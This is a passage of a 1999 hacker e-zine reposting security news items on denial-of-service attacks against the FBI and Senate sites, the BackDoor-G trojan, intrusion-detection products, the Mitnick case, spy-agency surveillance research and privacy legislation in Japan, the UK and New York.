Wednesday, www.fbi.gov stopped working. Credit claimed for hack According to the Web site www.antionline.com, an individual calling himself Israeli Ghost was taking credit for the attack on the FBI's site. The FBI was not immediately available to comment. "FBI WILL NOT {expletive deleted} WITH MY FRIENDS FROM GLOBAL HELL," the hacker allegedly wrote in an e-mail to Antionline. Other members of the hacking community, contacted by MSNBC, said the FBI site was hit by what's called a denial of service attack. In such an attack, the host computer is not actually controlled by an outsider; rather, outsiders bombard a Web site with so many simultaneous hits that it becomes overwhelmed and can no longer function. Most Hated said he didn't know who was responsible for the DOS attack. He said the FBI agents who raided him said the raid was in connection with "illegal telecom activity," which he believes is related to fraudulent teleconferences he set up. White House hack connection "The FBI told me that they were looking into illegal telecom activity," Most Hated told MSNBC. "The FBI said some company lost $250,000." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 41.0 [ISN] What's a Little Hacking Between Friends? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.zdnet.com/zdtv/siliconspin/features/story/0,3725,2245017,00.html What's a Little Hacking Between Friends? Spin debates hacking: Enjoyable hobby or criminal activity? How much does hacking hurt? The companies hacked by Kevin Mitnick say the intrusions cost them millions of dollars in lost business and damages-- and they're handing him a collective restitution bill of $300 million. Mitnick's lawyer, Don Randolph, says it's moot. Mitnick has spent years in jail, and when he gets out will be forbidden to touch a computer. Even discounting his legal bills, Mitnick is broke. Trying to decide how harmful hacking really is sent the Spin panel into a tizzy. ZDTV's managing editor, Shauna Sampson, aligned with Forbes' Dennis Kneale to play down the dark side of hacking, while Suzanne Anderson from GlobalNet Ventures looked at the cost to businesses. Finally, Spencer Ante of thestreet.com discussed how these financials can affect the market. [snip...] -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 42.0 [ISN] New hacker attack uses screensavers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.news.com/News/Item/0,4,37180,00.html?st.ne.fd.tohhed.ni New hacker attack uses screensavers By Erich Luening Staff Writer, CNET News.com May 28, 1999, 8:20 a.m. PT A new Trojan horse program sent by a hacker over the Internet via an email spam format as a screensaver could allow PCs to be accessed by unauthorized users. BackDoor-G Trojan horse is considered a potentially dangerous new Trojan horse program that could allow hackers to remotely access and control infected PCs over the Internet, according to network security and management software maker Network Associates. BackDoor-G affects Windows-based PCs. When executed, BackDoor-G turns a user's system into a client system for a hacker, giving virtually unlimited remote access to the system over the Internet. The Trojan also is virtually undetectable by the user, although it has been reported as spreading as a screensaver and an update to a computer game. The program is the latest in a string of new hybrid security threats that blur the line between viruses, security exploits, and malicious code attacks, the company said. BackDoor-G is difficult to detect because it is able to change its filename and therefore hide from some traditional virus eradication methods such as simply deleting suspicious files. Though BackDoor-G is not technically a virus, Network Associates advises PC users to request an update for both their antivirus and intrusion-detection software from their system administrators. Sal Viveros, group marketing manager for Total Virus Defense at Network Associates, said the company has received a few dozen samples of the attack since midmorning yesterday. "There is no one file name it uses," he said. "It spreads everywhere in the system. "There is a trend here. We're seeing more and more programs that are stealing information or creating holes to get access to systems remotely," Viveros added. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 43.0 [ISN] Hackers beware: IBM to sharpen Haxor ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: root http://www.zdnet.com/pcweek/stories/news/0,4153,2267089,00.html Hackers beware: IBM to sharpen Haxor By Jim Kerstetter, PC Week Online May 27 1999 4:49 PM ET Hackers beware: Haxor is watching you from its perch in IBM's wide-ranging security suite. This fall, Haxor is due for a face lift, along with IBM's Boundary Server firewall. They are two components of IBM's FirstSecure suite of applications, which includes everything from intrusion detection software to anti-virus software in the company's wider SecureWay security strategy. Haxor will gain several new features, including better scanning for stealth attacks, such as low-bandwidth hacks and coordinated attacks from different geographic points, and improved ability to detect mangled and overlapping packets, company officials said. IBM (NYSE:IBM) is also trying to improve Haxor's ability to filter out the white noise of regular network traffic, tuning it down enough so it can catch stealth attacks while not setting off frequent false alarms. Haxor was developed at IBM's Global Security Analysis Lab, in Hawthorne, N.Y., said Dave Safford, manager at the lab. There are two kinds of intrusion detection applications: One is based on servers or hosts and looks for attacks on that individual system; the other is network-based and sniffs packets as they come into the network, trying to determine if an attack is taking place. Haxor is network-based and can be found within IBM's FirstSecure suite as well as Tivoli Systems Inc.'s CrossSite network management suite. "There is an incredible amount of data that comes out of these things," Safford said. "It can be a real problem." To solve the problem, Safford said, IBM has developed "dynamic sensitivity," which will be able to correlate the difference between the attacks and legitimate traffic. Network administrators are particularly interested in integration with management tools from companies such as Tivoli. "That makes the most sense to me. I want to be able to manage this from one point," said Doug Mallow, network administrator at a West Coast bank. Also this fall, the Boundary Server firewall will be more tightly integrated with the SecureSite Policy Director, said IBM officials. Using the Common Content Inspection specification that is now under development, Boundary Server should be able to improve on performance, essentially sharing packets of data with other content inspection applications such as Content Technology Inc.'s MIMESweeper for e-mail inspection and Finjan Software Ltd.'s SurfinGate mobile code-scanning software. IBM in January unveiled its SecureWay strategy for Internet and network security. Like competing packages from Hewlett-Packard Co., SecureWay is made up of both home-grown and OEM applications. IBM also has developed a Security Policy Director to tie together its security pieces. IBM can be reached at (914) 499-1900 or www.ibm.com. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 44.0 [ISN] Feds Fend Off HACK3RZ ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Simon Taplin Feds Fend Off HACK3RZ You might want to resend any e-mails you fired off to the FBI or the U.S. Senate yesterday. Hackers shut down both Web sites in a two-for-one attack that online media outlets dug right into. News.com reported that the attackers' intent was to crash the FBI site, not intrude into its files. Are the perps international spies? Perhaps double agents? International anarchists? Most likely they're adolescents not old enough to drive, Alan Paller, director of research for the SANS (System Administration, Networking and Security) Institute told News.com's Paul Festa. ZDNet scored with colorful details that indicate Paller might be right. It ran with the story and reported that the Senate Web site, too, had been downed Thursday evening. But the level of threat appears more comic book than spy thriller, according to ZDNN reporter Joel Deane. Fbi.gov had been hacked by a group called Global Hell, and the nefarious culprits behind the Senate attack call themselves MAST3RZ 0F D0WNL0ADING, or M0D to their friends. Turns out M0D taunted the feds with the message they left plastered on senate.gov: "FBI vs. M0D in '99, BR1NG IT 0N!" ZDNet got into the story, going so far as to mirror the M0D hack and engage the assistance of CyberCrime's Luke Reiter. Hackers Deface Senate, Challenge FBI http://www.zdnet.com/zdnn/stories/news/0,4586,2267421,00.html?chkpt=hpqs014 No Security Lapse in FBI Hack Attack http://www.news.com/News/Item/0,4,37138,00.html -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 45.0 [ISN] High-tech snooping tools developed for spy agency ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Putrefied Cow Originally From: Anonymous Originally To: cypherpunks@toad.com High-tech snooping tools developed for spy agency The Vancouver Sun (May 24, 1999) Jim Bronskill Southam Newspapers OTTAWA -- Canada's electronic spy agency is quietly bankrolling the development of cutting-edge systems that can identify voices, analyze printed documents and zero in on conversations about specific topics. Documents show the Communications Security Establishment has enlisted the help of several leading Canadian research institutes to devise state-of-the-art snooping tools. CSE, an agency of the defence department, collects and processes telephone, fax and computer communications of foreign states, corporations and individuals. The federal government uses the intelligence gleaned from the data to support troops abroad, catch terrorists and further Canada's economic goals. CSE and counterpart agencies in the United States, Britain, Australia and New Zealand share intercepted communications of interest with one another, effectively creating a global surveillance web, according to intelligence experts. CSE's interest in high-tech devices that help locate specific conversations and documents is a clear indication the five-member alliance collects and sifts large volumes of civilian traffic, said Bill Robinson, a researcher in Waterloo, Ont., who has long studied the spy agencies. "This technology is needed to process vast communications streams when you're hunting for nuggets within it." Robinson said the devices have legitimate uses, but hold "potentially frightening" implications for people's privacy as the technology advances. The Centre for Pattern Recognition and Machine Intelligence, located at Concordia University in Montreal, received $355,000 to develop two systems for CSE that automatically analyze printed documents, such as faxes, once they are digitally captured in a computer data bank. The first system, completed early last year, quickly determines the language of a document, said the centre's C. Y. Suen. "Some humans may have problems in distinguishing Spanish from Portuguese, for example, or Spanish from Italian," he said. "So what we have developed is a system that can do it automatically." The second device electronically searches captured documents for distinct features, including logos, photos, text or signatures. Combining the two systems enables a user, for example, to search a data bank for Japanese documents containing photos, or Russian faxes with signatures. Records obtained by Southam News under the Access to Information Act show CSE commissioned several other projects during the last two years. They include: - An $84,981 contract with the University of Waterloo in Ontario for the "development of multilingual computer speech recognition systems." - A $115,000 agreement with the University of Quebec at Chicoutimi to research "speaker identification" procedures. - Work by the Centre de Recherche Informatique de Montreal on "topic spotting" -- a means of identifying the subject of a conversation. The $150,393 contract was the most recent of several awarded to CRIM. CSE spokesman Kevin Mills did not provide information on specific goals of the projects, but allowed: "In general, any research that we're funding has some kind of interest for CSE." The agency has been working on voice and phrase-detection systems for at least a decade. The documents, however, show the research continues, with some devices yet to be perfected. CSE and its four international partner agencies use computers capable of recognizing intercepted messages containing specified names, addresses, telephone numbers and other key words or numbers, says a new report on surveillance technology, by Scottish researcher Duncan Campbell. However, Campbell found the agencies lack systems for homing in on conversations featuring particular words. CSE would have trouble picking out a phone call with the words "assassination" or "revolution" because the speech recognition systems developed to date cannot instantly recognize an unknown person's voice traits. "The key problem, which is familiar to human listeners, is that a single word heard on its own can easily be misinterpreted, whereas in continuous speech the meaning may be deduced from surrounding words," says Campbell's report. -=-=-=-=- Spy agency developing powerful snoop tools May 24, 1999 By JIM BRONSKILL Southam Newspapers OTTAWA - Canada's electronic spy agency is quietly bankrolling the development of cutting-edge systems that can identify voices, analyze printed documents and zero in on conversations about specific topics. Documents show the Communications Security Establishment has enlisted the help of several leading Canadian research institutes to devise state-of-the-art snooping tools. CSE, an agency of the Defence Department, collects and processes telephone, fax and computer communications of foreign states, corporations and individuals. The federal government uses the intelligence gleaned from the data to support troops abroad, catch terrorists and further Canada's economic goals. CSE and counterpart agencies in the United States, Britain, Australia and New Zealand share intercepted communications of interest with one another, effectively creating a global surveillance web, according to intelligence experts. CSE's interest in high-tech devices that help locate specific conversations and documents is a clear indication the five-member alliance collects and sifts large volumes of civilian traffic, said Bill Robinson, a researcher in Waterloo, Ont., who has long studied the spy agencies. "This technology is needed to process vast communications streams when you're hunting for nuggets within it." Robinson said the devices have legitimate uses, but hold "potentially frightening" implications for people's privacy as the technology advances. "They'll be able to do things they never could've done in the past." The Centre for Pattern Recognition and Machine Intelligence, located at Concordia University in Montreal, received $355,000 to develop two systems for CSE that automatically analyze printed documents, such as faxes, once they are digitally captured in a computer data bank. The first system, completed early last year, quickly determines the language of a document, said the centre's C. Y. Suen. "Some humans may have problems in distinguishing Spanish from Portuguese, for example, or Spanish from Italian," he said. "So what we have developed is a system that can do it automatically." The second device electronically searches captured documents for distinct features, including logos, photos, text or signatures. Combining the two systems enables a user, for example, to search a data bank for Japanese documents containing photos, or Russian faxes with signatures. Records obtained by Southam News under the Access to Information Act show CSE commissioned several other projects during the last two years. They include: (*) An $84,981 contract with the University of Waterloo in Ontario for the "development of multilingual computer speech recognition systems." (*) A $115,000 agreement with the University of Quebec at Chicoutimi to research "speaker identification" procedures. (*) Work by the Centre de Recherche Informatique de Montreal on "topic spotting" - a means of identifying the subject of a conversation. The $150,393 contract was the most recent of several awarded to CRIM. CSE spokesman Kevin Mills did not provide information on specific goals of the projects, but allowed: "In general, any research that we're funding has some kind of interest for CSE." The agency has been working on voice- and phrase-detection systems for at least a decade. The documents, however, show the research continues, with some devices yet to be perfected. CSE and its four international partner agencies use computers capable of recognizing intercepted messages containing specified names, addresses, telephone numbers and other key words or numbers, says a new report on surveillance technology, by Scottish researcher Duncan Campbell. However, Campbell found the agencies lack systems for homing in on conversations featuring particular words. For example, CSE would have trouble picking out a phone call with the words "assassination" or "revolution" because the speech recognition systems developed to date cannot instantly recognize an unknown person's individual voice traits. "The key problem, which is familiar to human listeners, is that a single word heard on its own can easily be misinterpreted, whereas in continuous speech the meaning may be deduced from surrounding words," says Campbell's report. Montreal's CRIM is trying to get around the problem by devising the "topic spotting" system, says the report. In addition, intelligence agencies are using systems that recognize the "voiceprint" or speech pattern of targeted individuals, though the technology is not yet fully reliable. [end] -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 46.0 [ISN] Privacy issues have taken center stage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.wired.com/news/print_version/business/story/19973.html?wnpg=all (Wired News) TOKYO [6.2.99] -- Privacy issues have taken center stage as Japan prepares to enact legislation allowing the police to eavesdrop on phone calls, intercept fax and computer transmissions, and read email. The draconian measures are ostensibly intended to help law enforcement halt premeditated murders, trafficking in drugs and guns, and smuggling of illegal aliens into Japan. At least that's what a bill cobbled together by the country's coalition government says. The reality could be far more intrusive, especially after investigators receive an official green light to comb through private correspondence and communications. Japanese citizens' groups -- a hodgepodge of activists with little actual influence over policy decisions -- have decried the wiretapping legislation as a gross invasion of privacy, and opposition politicians boycotted a vote on the legislation last Friday. But the government insists that what Japan needs to restore public order is less civil liberty and more Big Brother. People here are scared. Crime -- once unthinkable in Japan -- is on the rise. The country's yakuza racketeers are growing increasingly bolder in their schemes as nearly a full decade of recession eats away at traditional revenue sources, such as payoffs from companies and corrupt politicians. For law-enforcement authorities, the trouble began back in 1995 when Aum Shinrikyo cultists released sarin gas in the Tokyo subway, killing a dozen people. The cops simply never saw the attack coming, and have been agitating for greater surveillance powers as a means of preventing such nastiness from happening again. Wiretapping is a convenient shortcut for investigators. And, as the pervasive eavesdropping of former East Bloc countries made undeniably clear, once authorities start listening it's a hard habit to break. Yozo Marutake, a former senior executive with a manufacturer of hearing aids called Rion, said last week that the Japanese police have been bugging phones for decades. How does he know this? Because his company sold the cops all their surveillance gear, and had done so since first being approached by authorities in 1957, he said. So why would the Japanese police now be seeking legal backing for their electronic skulking? One reason might have to do with charges from an opposition politician last year that his phone had been bugged. The courts upheld the politician's claims, although the cops never actually admitted being behind the incident. The Internet undoubtedly will be a low priority at first for Japan's snoops, but this will change as more people, criminals included, go online. For now, it looks like the cops are still unsure how to proceed where matters of cyberspace are concerned. Police last week raided the Sapporo home of an 18-year-old who had posted a bunch of hit tunes on his home page using the MP3 compression format. The teen, needless to say, hadn't worked out copyright issues in advance with related Japanese recording companies. Police didn't reveal how they learned about the song-laden site. But they said they moved quickly to shut things down after concluding that illegal actions were being perpetrated. This only took them three months of monitoring downloads to figure out. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 47.0 [ISN] Whitehouse to punish Hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.news.com/News/Item/0,4,37257,00.html (News.com) [6.1.99] WASHINGTON--Annoyed by a recent wave of attacks against official U.S. government Web sites, the White House today warned hackers who target federal Web sites that they will be caught and punished. "There's a government-wide effort to make sure that our computer systems remain secure," White House Press Secretary Joe Lockhart said in a briefing. "For those who think that this is some sort of sport, I think [it will be] less fun when the authorities do catch up with them...and these people are prosecuted," he said. To protect against attacks that in recent days and weeks have disabled sites run by the Energy Department, the FBI, the Senate, the Interior Department, and the White House, the Defense Department said it planned to shut down its Web site for a short time today, said Ken Bacon, the Pentagon's chief spokesman. "This is much more protective than reactive," Bacon said. "It's looking to the future to prevent the types of problems that the other agencies" have experienced in recent weeks on their sites, he said. Attacking U.S. government Web sites is becoming an increasingly popular tool of people angry with the Clinton administration and its agencies. Last week hackers responded to a six-state FBI sweep of about 20 suspected hackers by attacking several government Internet locations, forcing the FBI, the Interior Department, and the U.S. Senate to temporarily shut down their Web sites. After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from China attacked a handful of U.S. government sites, including one maintained by the Energy Department. In an unrelated incident, the official White House site was shut down briefly because of an attempt to tamper with it by unidentified hackers, officials said. In recent years the Justice Department's site was shut down once by hackers who put Nazi swastikas on its home page, and hackers forced the CIA to shut down its site after they changed the name from "Central Intelligence Agency" to "Central Stupidity Agency." With many U.S. government sites under attack, computer security experts are bracing for what could be a month full of additional Internet hacking incidents. Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February 1995, will demonstrate in 14 U.S. cities Friday, seeking his release to a halfway house and an easy probation when he is sentenced on June 14. Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud, computer fraud, and illegal interception of a wire communication. Federal officials said he impersonated an employee of Finland-based Nokia Mobile Phones to steal software worth $240,000. He also stole software from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun Microsystems, federal officials said. Supporters of Mitnick say the four years Mitnick has spent in jail awaiting trial is a harsher term than for many people convicted of violent crimes like robbery and assault. Their protest Friday will be seeking a more lenient sentence. The U.S. attorney for the Central District of California said Mitnick will be sentenced to 46 months in prison on June 14 as part of his plea bargain agreement with the government. Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie, also will be obliged to pay the victims of his crimes from any profits he makes from books or movies about his life, a spokesman for the U.S. attorney's office said. While hacking incidents may not be part of Friday's nationwide protest, there may be a surge in attacks across the Internet if Mitnick's sentence is perceived as too stiff, said John Vranesevich, the founder and director of AntiOnline. "Hackers attack when they're mad about something. The demonstration Friday will be an attempt to educate," said Vranesevich. "However, if Kevin Mitnick is put in jail, there very well could be more attacks after that." Still, other experts said Internet sites should upgrade their security against possible attack before Friday. "Given the timing, it probably would be a good idea to be more on guard than usual," said Jevon Jaconi, the district attorney of Kewaunee County, Wisconsin, and an expert in the developing field of cyberspace law. Between 70 percent and 80 percent of all Internet hacking attacks come on systems that have not updated their security codes, routinely sent by computer manufacturers and network administrators, Jaconi said. The best way to prevent hacking attacks in the future is to heed those security warnings and implement the needed changes, he said. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 48.0 [ISN] Federal Cybercrime unit hunts for hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [Moderator: This article will be going on the Errata site soon. This contains a wide variety of errors regarding the role and actions of John Vranesevich and AntiOnline. Mr. Richtel chose to believe JV at face value, and apparently did not challenge anything he said.] http://www.nytimes.com/library/tech/99/mo/biztech/articles/02hack.html June 2, 1999 Federal Cybercrime Unit Hunts for Hackers By MATT RICHTEL Raids by agents of the Federal Bureau of Investigation last week against several suspected computer hackers are part of a new Government cybercrime unit's crackdown against illegal tampering with computer networks and Web sites, a Federal prosecutor said Tuesday. The raids prompted a counteroffensive in which disparate hacker groups took responsibility for bringing down additional corporate and Government sites, including the F.B.I.'s public information site. The events escalated a longstanding game of tit-for-tat between pranksters using personal computers and a newly galvanized Federal police force stung by recent attacks on some of the Government's high-level Web sites. Paul E. Coggins, the United States Attorney in Dallas who is overseeing the effort, said yesterday that Federal prosecutors had issued 16 warrants in 12 jurisdictions after a yearlong investigation, but had not yet charged anyone with a crime. The investigation is part of the Government's new, Dallas-based cybercrime task force, which includes the F.B.I., the Secret Service, the United States Attorney's Office and the Defense Department, Coggins said. "It's probably the most far-reaching investigation of its kind," he said. "It's an investigation with national and international implications." Coggins declined to elaborate or to say whether the targets of the investigation were considered to be part of a conspiracy. Don K. Clark, a special F.B.I. agent in Houston, said the activities under investigation included stealing and misusing credit card numbers and computer passwords. Two of those who were raided by the bureau's agents last Wednesday said one connection between some of the targets was that they knew one another from various discussion groups in an Internet chat forum called Internet Relay Chat. The participants said that the talk sometimes revolved around hacking techniques but that they were not involved in any general hacking conspiracy with other members of the discussion groups. "I have never defaced any Web pages or taken out any major sites," said Paul Maidman, 18, of Waldwick, N.J., one of those who were raided. Referring to proprietary computer systems, he said: "I got into other servers. I'd look around, read some E-mail, and that would be it." Maidman said he was awakened last Wednesday morning by five or six armed F.B.I. agents surrounding a living room couch where he slept. He said the agents confiscated a computer, some diskettes, CD-ROM's and other computer paraphernalia. Two Internet service providers have also received requests for documentation in connection with the case. The requests, parts of which have been posted on the Internet, seek information about dozens of hackers, hacker groups and software used by hackers. John Vranesevich, who operates the Anti-Online Web site, which chronicles hacker activity, said the information requested from Internet service providers involved software tools, computer files and aliases pertaining to hacker activities. Vranesevich said several of the aliases actually represented software programs called "bots," which are posted in chat rooms as automated monitors but may have been mistaken by F.B.I. agents for human participants. "Anything that has to do with hackers they're going after," he said. "I'm not going to call this a witch hunt, but it's an uninformed investigation." Meanwhile, hacker groups continued attacks on corporate and Government computers, in some cases making sites inaccessible and, in others, taking over sites with their own messages, some of them profane. The F.B.I. site, taken down last week, remained inaccessible yesterday. One hacker group, which calls itself F0rpaxe, says it is based in Portugal and takes responsibility for "massive attacks" on various Web sites, sent a statement to Anti-Online saying, "If the F.B.I. doesn't stop we won't, and we can start destroying." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 49.0 [ISN] Hong Kong Computer Hacking Syndicate Smashed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ www.infowar.com 6/1/99 Hong Kong Computer Hacking Syndicate Smashed HONG KONG, CHINA, 1999 MAY 30 (Newsbytes) -- By Staff Writer, IT Daily. Hong Kong police arrested an organized group of computer hackers last week, seizing computers and CD-ROMS, after a five-month hunt. The arrests marked the first time an organized hacking group has been arrested in Hong Kong. Acting on complaints from several local Internet service providers (ISPs) that the accounts of their clients might had been hacked late last year, officers from the Computer Crime Section of the Commercial Crime Bureau (CCB) launched investigations in January, culminating in a series of raids last week. Two men, including a suspected hacker and a middleman were arrested in the first two days of the operation starting on May 20. In all, ten men were arrested. The suspects were aged between 16 and 21 and included three hackers, six buyers of the passwords and a middleman who arranged the sales. Operating as a syndicate, the hackers stole the passwords and personal information on legitimate Internet account holders and sold them. The principal hacker collected information on over 200 accounts and sold them through a middleman to users who wanted cheap, unlimited Internet access. Hilton Chan, head of the Computer Crime Section of the CCB told ITDaily.com that most of the end-users wanted to use the time to access online gaming sites. According to police, the buyers paid HK$350 (US$45.13) each for a month's access, and clocked up Internet time worth between HK$2,000 and HK$3,000 ($257.88 and $386.82) each. Most local ISPs charge under HK$150 ($19.34) per month for unlimited usage, but users must still pay HK$1.98 ($0.26) per hour for the Public Non-Exclusive Telecommunications (PNETS) license fee. The middleman communicated with its clients through telephone and the ICQ online cmessaging service. Investigations also showed that one of the hackers set up a Web page on the Internet offering pirate music CDs for sale. Each disk featured over 100 songs downloaded from the Internet or dubbed from copyrighted computer disks. The disks were selling for HK$88 ($11.35) each or HK$160 ($20.63) for two copies. Ten sets computers and peripheral equipment believed to be used in the hacking and about 700 CD-ROMs were seized during the operation. Chan said that the maximum penalty is five years' imprisonment. He also advised users to protect themselves against hackers. "Don't store your password on the computer terminal, and change your password more frequently," advised Chan. He also advised users not to use easy to replicate passwords and be careful when downloading from the Web. "If you don't know the source of it don't download it," Chan said. Exchange Rate: $1 = HK$7.75 -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 50.0 [ISN] New Tools Prevent Network Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.nytimes.com/techweb/TW_New_Tools_Prevent_Network_Attacks.html June 3, 1999 New Tools Prevent Network Attacks Filed at 8:49 a.m. EDT IT managers alarmed by high-profile security breaches are gaining new software tools to ward off network attacks. Axent Technologies this week will release an intrustion-detection system with improvements to protect networks against a range of existing and new types of attacks in real time. Internet Security Systems (ISS) will rollout a souped-up version of its RealSecure system that filters out false alarms from real attacks with greater efficiency and precision. Other vendors said they plan product updates by year's end. CyberSafe, for example, will deliver security features that detect intrusions in individual applications. The advancing functionality of these high-tech burglar alarms comes as Internet-based computing exposes security vulnerabilities. Recent hacker attacks on the FBI and other government websites, as well as the loss of sensitive nuclear weapons information to China, have heightened corporate awareness of the need for multiple layers of network security. As intrusion-detection systems "enter their midlife, they are starting to become a viable part of the total protection strategy in many corporations," said Mike Hagger, vice president of network security at Oppenheimer Funds. The investment company uses ISS' RealSecure to identify and respond to certain types of hacker attacks, such as SYN flood attacks. "Intrusion detection is only one line of defense," Hagger added, citing the need for firewalls, antivirus and authentication tools. Jim Patterson, director of security at service provider Level 3 Communications, agreed, saying intrusion-detection systems must move beyond simple event detection to behavioral analysis. If an intruder is using a "valid ID or password, the typical system wouldn't pick that up as wrong behavior," he said. IT managers also need tools that will help them build a baseline of typical usage patterns. Thus, if a user tried to access a network at 2 a.m., for example, an IT manager would be notified. "I want to get details on what things are being accessed and what systems are being used," Patterson said. For Electronic Data Systems, intrusion detection could be the first line of defense. The IT services provider is testing Axent's NetProwler 3.0 on the access point into the network-outside the firewall, said Wayde York, a network operations supervisor at EDS. By placing NetProwler at the network perimeter, it can detect "stealth scans and newer attacks" that the firewall typically won't pick up, he said. Placing the intrusion- detection system in front of the firewall also reduces the false alarms common to these network-based systems, York said, because it's less likely to have to monitor a wide variety of traffic types, as it would inside the firewall. NetProwler 3.0 also can send alerts to Check Point Software Technologies' Firewall-1 product -- which EDS uses -- once an attack is detected so that the firewall could then be reconfigured to fend off future attacks of the same type, York said. Tighter integration between NetProwler and Axent's host-based Intruder Alert system lets IT managers monitor network devices and servers from Intruder Alert's central management console. Protecting mixed platforms and critical resources is the goal behind ISS' product rollout, scheduled for the week of June 14. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 51.0 [ISN] U.K. Crypto Policy May Have Hidden Agenda ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.nytimes.com/techweb/TW_U_K_Crypto_Policy_May_Have_Hidden_Agenda.html June 3, 1999 U.K. Crypto Policy May Have Hidden Agenda Filed at 5:06 a.m. EDT By Madeleine Acey for TechWeb, CMPnet Despite its abandonment of key escrow, the U.K. could be counting on the ignorance of new Internet users to provide law enforcement easy access to private communications, according to privacy campaigners. Following a meeting in London on Wednesday, where ISPs drafted a code of practice for protecting user privacy, ISP and civil liberties groups both derided British and European Union attempts to regulate the use of encryption, caching and unsolicited email. ISP organizations, such as the London Internet Exchange -- or LINX -- described government policy as "extremely stupid," "misguided" and "infeasible." But some said they found it hard to believe incompetence was behind it. LINX chairman Keith Mitchell said the latest version of proposed legislation regarding law enforcement access to encrypted email and computer files was based on a "misguided conception" that ISPs would provide users with encryption. A senior government official said last week the government expected most warrants demanding keys to encrypted material would be served on service providers. "The only encryption of any use on the Internet is end-to-end. The keys are generated between the users. All the ISP is going to see is an encrypted data stream," Mitchell said. "I still don't know a single Home Office employee that has an email address," he said. But of the encryption warrant policy, he said the government "either doesn't understand or is deliberately misunderstanding." "I think they are deliberate," said Yaman Akdeniz of Cyber-Rights & Cyber-Liberties. "They don't want to give away what they want to do." He said there was a lot of pressure on lawmakers from the National Criminal Intelligence Service, which wanted easy access. "The Home Office believes users will go to [third parties], like the Post Office, to get keys," said Nicholas Bohm, spokesman for the Foundation for Information Policy Research. "They should not be promoting a policy where private keys are generated by anybody but the user." He, along with Akdeniz, said it was possible the government was planning to create a new market, favorable to easy law enforcement access, where new Internet users -- unaware of the tradition of free user-to-user encryption -- would go to "trusted third parties" for encryption services because they were endorsed by the government as safe. "If these new services are there, many people will use them," Akdeniz said. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 52.0 [ISN] Tackling E-Privacy in New York ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Dan Moniz Tackling E-Privacy in New York by Chris Oakes If the federal government won't get tough with the issue of online consumer privacy, New York state is determined to do it. The New York State Assembly has passed the part of a legislative package designed to erect unprecedented privacy safeguards for consumer information in the information age. "The more you learn about computers and email and ordering and passing information by email and the Internet, the more people realize that laws that protect them in different venues are not in place on the Internet," said Assemblywoman Audrey Pheffer. Pheffer, a Democrat from Queens, is head of the Consumer Affairs and Protections Committee and author of several measures in the legislative package, considered the most comprehensive state action on consumer privacy to date. Fourteen bills passed last week are expected to pass committee and reach the assembly floor as early as this week. The New York Senate plans to present its own privacy package this summer. The broad-ranging measures grew out of the increasing availability of personal information. The bills target privacy invasions that the assembly said could lead to everything from personal financial loss and damaged credit ratings to discrimination. The authors blame the new risks on computers and Internet use, and modern technology in general, which threaten privacy with everything from DNA advances to the widespread selling and distribution of digital information. "We had to do this because three to five years ago we never thought when we passed legislation that this would be something we'd have to deal with -- the theft of identity, the selling of email information, the selling of digital photo images," Pheffer said. The bills require confidentiality of personal records, prevent the selling of email addresses without consent, and prohibit various sophisticated telemarketing tricks enabled by modern technology. "We tried to deal with the many issues we and the attorney general have received complaints on," Pheffer said. Whereas consumers used to worry about the theft of a credit card or a driver license, Pheffer said that the dangers of information theft are much greater. "[A thief] can steal everything so that they [can] become you. We've had stories where people had automobiles ordered [in their name] and just by luck were able to actually stop the delivery of the car. It's much more than the stealing of a credit card." Identity theft is enabled by electronic access to home addresses, social security numbers, and the like, Pheffer said. The new legislation isn't just targeted at data collected by thieves. It places companies under scrutiny, too. "As technology provides more efficient ways for commercial enterprises to gather and distribute information to consumers, it is vital that the laws of the state be modernized to ensure personal privacy," said Attorney General Eliot Spitzer in statement. Spitzer is one of the primary authors and presenters of the legislative package. Spitzer said that the legislation he authored will strengthen the individual's control over personal information. Privacy experts and advocates are 